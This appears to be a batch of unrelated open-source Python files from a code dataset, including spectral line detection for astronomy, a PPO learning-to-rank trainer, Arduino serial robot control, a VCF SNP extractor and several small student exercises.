Each element of the list is a 3-tuple in the form\n        (wavelength in Angstrom, Line name, Line type).\n\n    \"\"\"\n    if name is None:\n        selected_lines = RESTFRAME_LINES[:]\n    else:\n        selected_lines = [\n            line\n            for line in RESTFRAME_LINES\n            if name.lower() == line[1].lower()\n        ]\n    if line_type is not None:\n        selected_lines = [\n            line\n            for line in selected_lines\n            if line_type.lower() in line[2].lower()\n        ]\n\n    selected_lines = [\n        ((1 + z) * line[0], line[1], line[2])\n        for line in selected_lines\n    ]\n\n    if wrange is not None:\n        w_min = np.nanmin(wrange)\n        w_max = np.nanmax(wrange)\n        selected_lines = [\n            line\n            for line in selected_lines\n            if w_min <= line[0] <= w_max\n        ]\n\n    return selected_lines\n\n\ndef get_spectrum_lines(\n    wavelengths: np.ndarray,\n    flux: np.ndarray,\n    var: Optional[np.ndarray] = None,\n    sigma_threshold: Optional[float] = 10.0,\n    smoothing_window: Optional[int] = 51,\n    smoothing_order: Optional[int] = 1,\n    glob_smoothing: Optional[int] = 3):\n    \"\"\"\n    Identify the position of clear emission or absorption lines.\n\n    Parameters\n    ----------\n    wavelengths : np.ndarray\n        The wavelengths corresponding to each flux value.\n    flux : numpy.ndarray\n        The spectrum itself.\n    var : numpy.ndarray, optional\n        The variance of the spectrum itself.\n        The default value is None.\n    sigma_threshold : float, optional\n        The threshold to use for line identification.\n        The default value is 10.0\n    smoothing_window : int, optional\n        Parameter to be passed to the smoothing function.\n        The default value is 51.\n    smoothing_order : int, optional\n        Parameter to be passed to the smoothing function.\n        The default value is 1.\n    glob_smoothing : int, optional\n        Parameter used for line identification.\n        The default value is 3\n\n    Returns\n    -------\n    identifications : list\n        A list of tuples. Each tuple has the form of (k, w, l, h) and contains\n        the index k for the wavelength w of the line, the approximate max width\n        l of the line and a height h of the line. Note that l and h are not\n        actual physical quantities and should be used with caution when\n        comparing to other values from a different spectrum.\n    \"\"\"\n    if np.isnan(flux).all():\n        return np.nan\n    else:\n        flux = savgol_filter(flux.copy(), glob_smoothing, 1)\n        flux = np.ma.array(flux, mask=np.isnan(flux))\n\n    if var is not None:\n        var = np.ma.array(var.copy(), mask=np.isnan(var))\n    else:\n        var = 1.0\n\n    smoothed_spec = savgol_filter(flux, smoothing_window, smoothing_order)\n    smoothed_spec = np.ma.array(smoothed_spec, mask=np.isnan(smoothed_spec))\n\n    # Subtract the smoothed spectrum from the spectrum itself to get a\n    # crude estimation of the noise, then square it and divide by the variance\n    # and then go back with a square root\n    norm_noise = ((flux - smoothed_spec)**2) / var\n    norm_noise = np.ma.sqrt(norm_noise)\n\n    # Get the median value of the noise. The median is more robust against the\n    # presence of lines with respect to the mean\n    noise_median = np.ma.median(norm_noise)\n\n    # Get the NMAD of the noise. We assume here that the noise has a\n    # unimodal distribution (eg. 
gaussian like), and this is a good assumption\n    # if the noise is due only to the random fluctuations\n    noise_nmad = median_abs_deviation(norm_noise, scale='normal')\n\n    norm_noise_deb = np.abs(norm_noise - noise_median)\n\n    # Get the possible lines\n    outlier = norm_noise_deb >= (sigma_threshold * noise_nmad)\n\n    # Delete identifications with length 1 (almost all are fake)\n    for k, v in enumerate(outlier):\n        if (k == 0) or (k == len(outlier)-1):\n            continue\n        if v and ((outlier[k-1] == 0) and (outlier[k+1] == 0)):\n            outlier[k] = 0\n\n    # Merge almost contiguous identifications\n    for k in range(1, glob_smoothing+1):\n        outlier[k:] += outlier[:-k]\n        outlier[:-k] += outlier[k:]\n\n    # Get position, width and height of the identifications\n    identifications = []\n    c_start = None\n    c_wstart = None\n    c_end = None\n    for k, v in enumerate(outlier):\n        if v:\n            if c_start is None:\n                c_start = k\n                c_wstart = wavelengths[k]\n            c_end = None\n        elif c_start is not None:\n            if c_end is None:\n                c_end = k\n            c_wh = np.ma.max(norm_noise_deb[c_start: c_end])\n            c_wh /= noise_nmad\n            c_max_pos = np.ma.argmax(norm_noise_deb[c_start: c_end])\n            c_pos_idx = c_start + c_max_pos\n            c_wpos = wavelengths[c_pos_idx]\n            c_wlen = wavelengths[k] - c_wstart\n            identifications.append((c_pos_idx, c_wpos, c_wlen, c_wh))\n            c_start = None\n\n    # Sorting by height\n    identifications.sort(key=lambda a: a[3])\n    return identifications\n\n\ndef get_redshift_from_lines(identifications: Union[tuple, list, np.array],\n                            z_max: Optional[float] = 6,\n                            z_min: Optional[float] = 0,\n                            z_points: Optional[Union[float, None]] = None,\n                            tol: Optional[float] = None):\n    \"\"\"\n    Get the redshift of a set of line identifications.\n\n    Parameters\n    ----------\n    identifications : Union[tuple, list, np.array]\n        A list of identifications generated by get_spectrum_lines().\n    z_max : Optional[float], optional\n        The maximum redshift. The default is 6.\n    z_min : Optional[float], optional\n        The minimum redshift. The default is 0.\n    z_points : Optional[Union[float, None]], optional\n        Number of redshift values between z_min and z_max to test.\n        If None, then z_points = 1000*(z_max - z_min).\n        The default is None.\n    tol : Optional[float], optional\n        The tolerance. 
If None, it is computed automatically.\n        The default is None.\n\n    Returns\n    -------\n    z_values\n        Best estimations of the redshift sorted from the most probable to the\n        least probable.\n    z_probs\n        Pseudo-probabilities of the redshift estimations (the higher the better)\n    \"\"\"\n    if len(identifications) < 2:\n        return None\n\n    if z_points is None:\n        z_points = 1000 * (z_max - z_min)\n\n    if tol is None:\n        tol = np.mean([x[2] for x in identifications])\n\n    mymodel = Emission1D(identifications, tol, redshift=0)\n\n    z_values = np.linspace(z_min, z_max, z_points)\n    prob_values = np.zeros_like(z_values)\n    for j, z in enumerate(z_values):\n        rest_lines_lam = [\n            x[0] for x in get_lines(z=z)\n        ]\n\n        prob_values[j] = np.sum(mymodel(rest_lines_lam))\n\n    peak_indices = find_peaks_cwt(prob_values, 1)\n    z_values_p = z_values[peak_indices]\n    z_prob_p = prob_values[peak_indices]\n\n    z_prob_p_sorted_ind = np.argsort(z_prob_p)[::-1]\n    z_values_p = z_values_p[z_prob_p_sorted_ind]\n    z_prob_p = z_prob_p[z_prob_p_sorted_ind]\n\n    mean_prob = np.median(z_prob_p)\n    std_prob = np.std(z_prob_p)\n\n    plausible_mask = z_prob_p >= mean_prob + std_prob\n\n    return (z_values_p[plausible_mask], z_prob_p[plausible_mask])\n","repo_name":"mauritiusdadd/python-specex","sub_path":"src/specex/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":11455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13047667765","text":"from cavachon.distributions.Distribution import Distribution\r\nfrom typing import Mapping, Union\r\n\r\nimport tensorflow as tf\r\nimport tensorflow_probability as tfp\r\n\r\nclass IndependentZeroInflatedNegativeBinomial(Distribution, tfp.distributions.Mixture):\r\n  \"\"\"IndependentZeroInflatedNegativeBinomial\r\n  \r\n  Distribution for independent zero-inflated negative binomial.\r\n  \r\n  \"\"\"\r\n  def __init__(self, *args, **kwargs):\r\n    super().__init__(*args, **kwargs)\r\n    return\r\n  \r\n  @classmethod\r\n  def from_parameterizer_output(\r\n      cls,\r\n      params: Union[tf.Tensor, Mapping[str, tf.Tensor]],\r\n      **kwargs):\r\n    \"\"\"Create independent zero-inflated negative binomial distributions \r\n    from the outputs of\r\n    modules.parameterizers.IndependentZeroInflatedNegativeBinomial\r\n\r\n    Parameters\r\n    ----------\r\n    params: Union[tf.Tensor, Mapping[str, tf.Tensor]]\r\n      Parameters for the distribution created by parameterizers. \r\n      Alternatively, a mapping of tf.Tensor with parameter name as \r\n      keys can be provided. If provided with a tf.Tensor, the last \r\n      dimension needs to be a multiple of 3, and:\r\n      1. params[..., 0:p] will be used as the logits. \r\n      2. params[..., p:2*p] will be used as the mean.\r\n      3. params[..., 2*p:3*p] will be used as the dispersion.\r\n      If provided with a Mapping, 'logits', 'mean', 'dispersion' \r\n      should be in the keys of the Mapping. Note that in both cases:\r\n      1. The batch_shape should be the same as [..., p]. \r\n      2. The event_shape should be []. 
\r\n\r\n Returns\r\n -------\r\n tfp.distributions.Distribution\r\n Created Tensorflow Probability Zero-inflated Negative Binomial\r\n Distribution.\r\n \r\n \"\"\"\r\n\r\n if isinstance(params, tf.Tensor):\r\n logits, mean, dispersion = tf.split(params, 3, axis=-1)\r\n elif isinstance(params, Mapping):\r\n logits = params.get('logits')\r\n mean = params.get('mean')\r\n dispersion = params.get('dispersion')\r\n \r\n probs = tf.math.sigmoid(logits)\r\n probs = tf.stack([probs, 1 - probs], axis=-1)\r\n\r\n # batch_shape: (batch, ), event_shape: (event_dims, )\r\n return cls(\r\n cat=tfp.distributions.Categorical(probs=probs),\r\n components=(\r\n tfp.distributions.NegativeBinomial.experimental_from_mean_dispersion(\r\n 1e-7 * tf.ones_like(mean),\r\n dispersion),\r\n tfp.distributions.NegativeBinomial.experimental_from_mean_dispersion(\r\n mean,\r\n dispersion)),\r\n **kwargs)","repo_name":"dn070017/CAVACHON","sub_path":"cavachon/distributions/IndependentZeroInflatedNegativeBinomial.py","file_name":"IndependentZeroInflatedNegativeBinomial.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16602866004","text":"import codes\r\nimport os\r\nimport time\r\n# Here is the switch: each option calls its function, and 'search' opens a second switch\r\ndef switch(lines,matrix,new_lines):\r\n while True:\r\n print(\"Type 'read' to read the matrix.\")\r\n print(\"Type 'print' to print the matrix.\")\r\n print(\"Type 'add' to add 2 matrices.\")\r\n print(\"Type 'acces' to access an item.\")\r\n print(\"Type 'search' to open the search menu.\")\r\n print(\"Type 'multiply' to multiply 2 matrices\")\r\n print(\"Type 'compare' to lexicographically compare 2 matrices\")\r\n print(\"Type anything else to exit.\")\r\n action = input(': ')\r\n if \"read\" in action:\r\n codes.read_matrix(lines, matrix)\r\n elif \"print\" in action:\r\n codes.print_matrix(lines, matrix)\r\n elif \"add\" in action:\r\n print(\"Note: if the matrices are different sizes the program won't return an error; it will compute the matrices either way\")\r\n time.sleep(3)\r\n matrix=codes.matrix_addition(lines,matrix,new_lines)\r\n lines = int(new_lines[0])\r\n elif \"acces\" in action:\r\n codes.access_item(lines,matrix)\r\n elif \"multiply\" in action:\r\n matrix=codes.matrix_multiplication(lines,matrix,new_lines)\r\n lines = int(new_lines[0])\r\n elif \"search\" in action:\r\n while True:\r\n print(\"Type 'first' to search for the first occurrence of the string.\")\r\n print(\"Type 'all' to search for all occurrences of the string.\")\r\n print(\"Type 'last' to search for the last occurrence of the string.\")\r\n print(\"Type anything else to exit.\")\r\n action_2=input(': ')\r\n if \"first\" in action_2:\r\n codes.search_item_1st(matrix,lines)\r\n elif \"all\" in action_2:\r\n codes.search_item_all(matrix,lines)\r\n elif \"last\" in action_2:\r\n codes.search_item_last(matrix,lines)\r\n else:\r\n break\r\n time.sleep(2)\r\n os.system('cls')\r\n elif \"compare\" in action:\r\n codes.lex_copare(lines,matrix)\r\n else:\r\n break\r\n input('Press enter to continue...')\r\n os.system('cls')","repo_name":"DonCo007/Matrice_caractere","sub_path":"Prob 6/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2317483730","text":"# Author: JD 01/12/2022\n\ndef tem_conv():\n while True:\n try: \n temp = 
float(input(\"Enter the temperature: \"))\n type = input(\"Convert it into?(f/c)\").upper()\n if type == \"C\":\n result = (temp - 32) * 5 / 9\n print(\"The temperature in celsius is {0}.\".format(result))\n elif type == \"F\":\n result = temp / 5 * 9 + 32\n print(\"The temperature in celsius is {0}.\".format(result))\n else:\n print(\"Invalid input, enter either f to transfer it into fahrenheir and c for celsius.\")\n except ValueError:\n print(\"Invalid input, enter a numerical value for the temperature\")\n\n\ntem_conv()","repo_name":"fp-computer-programming/hw-9-3-p22jdiao","sub_path":"hw9-3-1.py","file_name":"hw9-3-1.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25127570152","text":"from __future__ import annotations\n\nimport pyarrow as pa\n\nfrom rerun.components import REGISTERED_COMPONENT_NAMES, ComponentTypeFactory\n\n__all__ = [\n \"DrawOrderArray\",\n \"DrawOrder\",\n]\n\n\nclass DrawOrderArray(pa.ExtensionArray): # type: ignore[misc]\n def splat(draw_order: float) -> DrawOrderArray: # type: ignore[misc]\n storage = pa.array([draw_order], type=DrawOrder.storage_type)\n return storage # type: ignore[no-any-return]\n\n\nDrawOrder = ComponentTypeFactory(\"DrawOrder\", DrawOrderArray, REGISTERED_COMPONENT_NAMES[\"rerun.draw_order\"])\n\npa.register_extension_type(DrawOrder())\n","repo_name":"yuancaimaiyi/rerun","sub_path":"rerun_py/rerun_sdk/rerun/components/draw_order.py","file_name":"draw_order.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"32895547632","text":"#extract snp info (pos, ref, alt) for joining to eqtl data\nimport itertools\nimport gzip\n\neqtl_anno = open(\"eqtl_anno.txt\", \"w\")\neqtl_anno.write(\"snps,pos_snps,ref,alt\\n\")\n#with gzip.open(\"test.vcf.gz\") as f:\nwith gzip.open(\"All_20180423.vcf.gz\") as f:\n for line in itertools.islice(f, 56, None): #skip first 56 lines (notes)\n snp_info = line.split(\"\\t\")\n (CHROM, POS, ID, REF, ALT) = snp_info[0:5] \n if len(REF) == 1 and len(ALT) == 1: #keep only SNPs, no indels\n eqtl_anno.write(ID + \",\" + POS + \",\" + REF + \",\" + ALT + \"\\n\")\neqtl_anno.close()\n","repo_name":"aandaleon/MESA_revisions","sub_path":"vcf_to_eqtl.py","file_name":"vcf_to_eqtl.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33497322237","text":"from Environment import Dataset, update_state\nfrom Evaluation import validate_individual, calculate\nfrom AgentPPO import Agent\nimport time\nfrom progress.bar import Bar\nimport numpy as np\nimport os\nimport pickle\nimport argparse\nimport torch\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nfrom visualizer import visualize\n\ntorch.manual_seed(4)\nnp.random.seed(4)\nrandom.seed(4)\n\n\ndef train(model, data, t_steps, c1, c2):\n model.actor.train()\n model.critic.train()\n dcg_results = {}\n ts = time.time()\n bar = Bar('Training', max=len(data.getTrain()))\n episode_rewards_list = []\n epoch_avg_step_reward = 0\n for Q in data.getTrain():\n done = False\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n episode_reward = 0\n learn_iters = 0\n effective_length = min(t_steps, len(state)-1)\n for t in range(0, min(t_steps, len(state)-1)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, 
dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action, prob, val = model.choose_action(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, reward = update_state(t, Q, state[action], state, data.getTruth())\n\n episode_reward += reward\n\n if t == min(t_steps-1, len(state)-2):\n done = True\n\n model.remember(data.getRelevance(Q, state), observation, action, prob, val, reward, done)\n\n\n # Update state\n state = state_\n\n model.learn(c1, c2)\n\n epoch_avg_step_reward += episode_reward / effective_length\n episode_rewards_list.append(episode_reward / effective_length)\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n bar.next()\n\n bar.finish()\n print(f'\\n Average step reward: {round(epoch_avg_step_reward / len(data.getTrain()), 4)}, time: {round(time.time() - ts)}')\n final_result = calculate(dcg_results)\n print(f\"NDCG@1: {final_result[0]}\\t\"\n f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result, episode_rewards_list\n\ndef train_init(model, data):\n model.actor.eval()\n model.critic.eval()\n score = 0\n dcg_results = {}\n ts = time.time()\n bar = Bar('Train', max=len(data.getTrain()))\n for Q in data.getTrain():\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n for t in range(0, len(state)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action = model.choose_action_test(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, _ = update_state(t, Q, state[action], state, data.getTruth())\n\n # Update state\n state = state_\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n bar.next()\n\n bar.finish()\n final_result = calculate(dcg_results)\n print(f\"NDCG@1: {final_result[0]}\\t\"\n f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result, [0]\n\ndef test(model, data):\n model.actor.eval()\n model.critic.eval()\n dcg_results = {}\n ts = time.time()\n bar = Bar('Testing', max=len(data.getTest()))\n for Q in data.getTest():\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n for t in range(0, len(state)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action = model.choose_action_test(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, _ = update_state(t, Q, state[action], state, data.getTruth())\n\n # Update state\n state = state_\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n bar.next()\n\n bar.finish()\n final_result = calculate(dcg_results)\n print(f\"NDCG@1: {final_result[0]}\\t\"\n f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result\n\n\ndef vali(model, data):\n model.actor.eval()\n 
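# eval() puts the actor/critic into inference mode (relevant if the networks contain dropout or batch-norm layers)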
model.critic.eval()\n score = 0\n dcg_results = {}\n ts = time.time()\n # bar = Bar('Validating', max=len(data.getVali()))\n for Q in data.getVali():\n dcg_results[Q] = []\n state = data.getDocQuery()[Q]\n action_list = []\n for t in range(0, len(state)):\n observation = [data.getFeatures()[x] for x in state]\n observation = np.array(observation, dtype=float)\n\n # Note: Actor takes action and returns index of the state\n action = model.choose_action_test(observation, data.getRelevance(Q, state))\n action_list.append(state[action])\n\n # Update to next state and get reward\n state_, _ = update_state(t, Q, state[action], state, data.getTruth())\n\n # Update state\n state = state_\n\n # Update Query DCG results:\n dcg_results[Q] = validate_individual(data.getTruth()[Q], data.getIDCG()[Q], action_list)\n dcg_results[Q] = np.round(dcg_results[Q], 4)\n\n # bar.next()\n\n # bar.finish()\n # print(f'\\n TotalReward: {round(np.array(score_history).mean(), 4)}, time: {round(time.time() - ts)}')\n final_result = calculate(dcg_results)\n # print(f\"NDCG@1: {final_result[0]}\\t\"\n # f\"NDCG@3: {final_result[2]}\\tNDCG@5: {final_result[4]}\\tNDCG@10: {final_result[9]}\")\n\n return final_result\n\n\ndef pickle_data(data, output_file):\n output_handle = open(output_file, 'wb')\n pickle.dump(data, output_handle)\n output_handle.close()\n\ndef get_name(datadir):\n lst=datadir.split('/')\n ds=\"\"\n for i in lst:\n if('ohsumed' in i.lower()):\n ds='OHSUMED'\n elif('mq2008' in i.lower()):\n ds='MQ2008'\n elif('mq2007' in i.lower()):\n ds='MQ2007'\n elif('mslr-web10k' in i.lower()):\n ds='MSLR-WEB10K'\n if(len(ds)==0):\n print(\"Wrong Dataset,Please check path\")\n exit()\n else:\n return ds\n\nif __name__ == '__main__':\n # Taking arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-d\", \"--data\", required=True,\n help=\"relative or absolute directory of the directory where complete dictionary exists\")\n ap.add_argument(\"-f\", \"--fold\", required=True,\n help=\"Fold\")\n ap.add_argument(\"-i\", \"--iterations\", required=True,\n help=\"number of iterations to run for\")\n ap.add_argument(\"-nf\", \"--features_no\", required=True,\n help=\"number of features in the dataset\")\n ap.add_argument(\"-g\", \"--gamma\", required=False, default=1,\n help=\"Gamma value; default = 1\")\n ap.add_argument(\"-alpha\", \"--alpha\", required=False, default=0.0001,\n help=\"Learning rate of the actor \")\n ap.add_argument(\"-beta\", \"--beta\", required=False, default=0.0002,\n help=\"Learning rate of the critic \")\n ap.add_argument(\"-hnodes\", \"--hidden_layer_nodes\", required=False, default=45,\n help=\"Number of hidden nodes \")\n ap.add_argument(\"-steps\", \"--episode_length\", required=False, default=20,\n help=\"Number of steps to take in each episode\")\n ap.add_argument(\"-batch_size\", \"--mini_batch_size\", required=False, default=5,\n help=\"size of the mini batch\")\n ap.add_argument(\"-epochs\", \"--epochs\", required=False, default=1,\n help=\"epochs to optimize surrogate\")\n ap.add_argument(\"-clip\", \"--policy_clip\", required=False, default=0.1,\n help=\"clipping parameter\")\n ap.add_argument(\"-lambda\", \"--gae_lambda\", required=False, default=1.0,\n help=\"smoothing factor for gae\")\n ap.add_argument(\"-c1\", \"--VF_coef\", required=False, default=0.5,\n help=\"VF coef\")\n ap.add_argument(\"-c2\", \"--S_coef\", required=False, default=0.01,\n help=\"Entropy coef\")\n args = vars(ap.parse_args())\n\n # Initializing arguments\n data_dir = str(args[\"data\"])\n fold = 
int(args[\"fold\"])\n num_features = int(args[\"features_no\"])\n num_iterations = int(args[\"iterations\"])\n gamma = float(args[\"gamma\"])\n alpha_agent = float(args[\"alpha\"])\n beta_agent = float(args[\"beta\"])\n hidden_layers = int(args[\"hidden_layer_nodes\"])\n policyclip = float(args[\"policy_clip\"])\n gaelambda = float(args[\"gae_lambda\"])\n\n # Extra arguments for PPO\n T_steps = int(args[\"episode_length\"])\n batch_size = int(args[\"mini_batch_size\"])\n n_epochs = int(args[\"epochs\"])\n c1 = float(args[\"VF_coef\"])\n c2 = float(args[\"S_coef\"])\n\n all_data = data_dir + f'/Fold{fold}/'\n data_object = Dataset(all_data, num_features)\n\n agent = Agent(alpha=alpha_agent, beta=beta_agent, n_actions=1, batch_size=batch_size, n_epochs=n_epochs,\n input_dims=[num_features],\n data=data_object, policy_clip=policyclip, gae_lambda=gaelambda, nodes=hidden_layers)\n\n \n train_results = []\n vali_results = []\n test_results = []\n\n print(\"\\n--- Training Started ---\\n\")\n for i in range(0, num_iterations):\n print(f\"\\nIteration: {i + 1}\\n\")\n\n train_results.append(train(agent, data_object, T_steps, c1, c2))\n print()\n test_results.append(test(agent, data_object))\n print()\n vali_results.append(vali(agent, data_object))\n\n agent.save_models() \n\n filename = f\"./Result/{get_name(data_dir)}/train_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}_actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\"\n\n pickle_data(train_results, filename)\n \n pickle_data(vali_results, f\"./Result/{get_name(data_dir)}/vali_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}__actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\")\n \n pickle_data(test_results,\n f\"./Result/{get_name(data_dir)}/test_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}_actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\")\n \n outfile = f\"./Result/{get_name(data_dir)}/plot_train_fold_{all_data[-2]}_iter_{num_iterations}_clip_{policyclip}_c1_{c1}_c2_{c2}_lambda_{gaelambda}_actor_lr_{alpha_agent}_critic_lr_{beta_agent}_g_{gamma}_hnodes_{hidden_layers}_T_{T_steps}_mbsize_{batch_size}_epochs_{n_epochs}\"\n\n visualize(train_results, outfile)","repo_name":"roshan1999/Information-Retrieval","sub_path":"PPORank/PPORank_Fold/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34280763129","text":"import os\n\nemails = set()\nfor dir in os.listdir(\"final_project/emails_by_address\"):\n s = dir.find(\"from_\")\n if s == -1:\n s = dir.find(\"to_\")\n e = dir.find(\"@\", s + 3)\n emails.add(dir[s + 3:e])\n else:\n e = dir.find(\"@\", s + 5)\n emails.add(dir[s + 5:e])\n\n with open(\"final_project/emails_by_address/\"+dir) as email:\n for line in email:\n s = line.find(\"maildir/\")\n e = line.find(\"/\", s+8)\n emails.add(line[s+8:e])\n\n\nprint(emails)\nprint(len(emails))","repo_name":"pr3mar/dh2016","sub_path":"unique_set.py","file_name":"unique_set.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"42529621404","text":"'''\nArduino Control\n===============\n\nProvides a framework using pygame and pyserial\nfor serial control of an Arduino Robot.\n\nControl using the WASD keys.\n'''\n\nimport serial\nimport struct\nimport random\nimport time\nimport pygame\nimport sys\n\nclass Arduino():\n \"\"\"\n Represents an Arduino robot connected by USB.\n Allows user to send commands to the robot through a serial connection.\n \"\"\"\n\n def __init__(self, user_port='/dev/ttyACM0', user_baud=115200, user_timeout=1):\n \"\"\"\n Constructor for class Arduino\n \"\"\"\n\n self.connected = False\n self.ser = serial.Serial(user_port, user_baud, timeout=user_timeout)\n\n # valid commands: forward, backward, pivot right, pivot left, brake\n self.validCommands = ['f','b','r','l','s']\n\n # connect to the serial port\n self.connect()\n\n\n def sendCommand(self, command):\n \"\"\"\n Writes command to serial port to be read.\n Note that both command and the duration of the command must be encoded to bytes.\n \"\"\"\n\n self.ser.write(bytes(command.encode('utf-8')))\n\n # check if command is valid\n assert command in self.validCommands, \"%r is not a valid command\" % command\n\n # wait for Arduino to finish executing the command.\n while self.ser.read() == command:\n self.ser.read()\n\n\n def connect(self):\n \"\"\"\n Connect to Arduino through serial connection.\n Wait until response from Arduino.\n \"\"\"\n\n print(\"Connecting to port\", self.ser.port)\n\n while not self.connected:\n serin = self.ser.read()\n self.connected = True\n print(\"Connected!\")\n\n # self.calibrate()\n\n\n def disconnect(self):\n \"\"\"\n Disconnect in case of emergency.\n \"\"\"\n\n self.connected = False\n self.ser.close()\n\nif __name__ == '__main__':\n pygame.init()\n size = [800, 600]\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption('Arduino Control')\n robot = Arduino()\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n robot.sendCommand('l')\n elif event.key == pygame.K_d:\n robot.sendCommand('r')\n elif event.key == pygame.K_w:\n robot.sendCommand('f')\n elif event.key == pygame.K_s:\n robot.sendCommand('b')\n elif event.key == pygame.K_ESCAPE:\n sys.exit(0)\n elif event.type == pygame.KEYUP:\n robot.sendCommand('s')","repo_name":"zhangxingshuo/py-robot","sub_path":"Arduino/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28712909671","text":"n = input(\"enter number: \")\nn = int(n)\nincrease = start = 6 #28\nprime = []\nsum_divisors = 0\ncounter = 1\nwhile True:\n while counter < increase:\n if increase % counter == 0:\n sum_divisors += counter\n counter += 1\n else:\n counter += 1\n\n if increase == sum_divisors:\n prime = prime + [increase]\n increase += 1\n print(prime)\n else:\n # print(n, \"is not perfect\")\n increase += 1\n \n","repo_name":"tzvetandacov/Programming0","sub_path":"is_perfect.py","file_name":"is_perfect.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30286960479","text":"from enum import Enum\n\n#Resources = Enum('Resources', 'Saffron,Cinnamon,Vanilla,Clove,Ivory,Fine_Timber,Wool,Pelts,Cattle,Rice,Wheat,Iron,Gold,Silver')\n\nWood = [\"forest\", \"jungle\", \"low hills\", \"hills\", \"alpine\"]\n\nGrain = 
[\"grassland\", \"plains\"]\n\nWool = [\"shrubland\", \"grassland\", \"low hills\"]\n\nCattle = [\"grassland\", \"plains\"]\n\nFruit = [\"jungle\"]\n\nSaffron = [\"plains\", \"savannah\"]\n\nCinnamon = [\"plains\", \"savannah\", \"low hills\"]\n\nClove = [\"jungle\", \"low hills\"]\n\nIvory = [\"savannah\", \"ocean\"]\n\nShellfish = [\"shallows\", \"sea\", \"ocean\"]\n\nFish = [\"shallows\", \"sea\", \"lake\"]\n\nPelts = [\"taiga\", \"tundra\", \"snowpack\", \"ice\", \"low hills\", \"alpine\"]\n\n\nIron = [\n \"grassland\",\n \"taiga\",\n \"alpine\",\n \"plains\",\n \"low hills\",\n \"hills\",\n \"low mountains\",\n \"mountains\"]\n\nGold = [\n \"plains\",\n \"shrubland\",\n \"savannah\",\n \"low hills\",\n \"hills\",\n \"low mountains\",\n \"mountains\"]\n\nSilver = [\n \"grassland\",\n \"taiga\",\n \"alpine\",\n \"low hills\",\n \"hills\",\n \"low mountains\",\n \"mountains\"]\n\n\nJewels = [\n \"desert\",\n \"shrubland\",\n \"taiga\",\n \"low hills\",\n \"hills\"]\n\nrare_resources = [\"saffron\",\n \"cinnamon\",\n \"clove\",\n \"ivory\",\n \"pelts\",\n \"gold\",\n \"silver\",\n 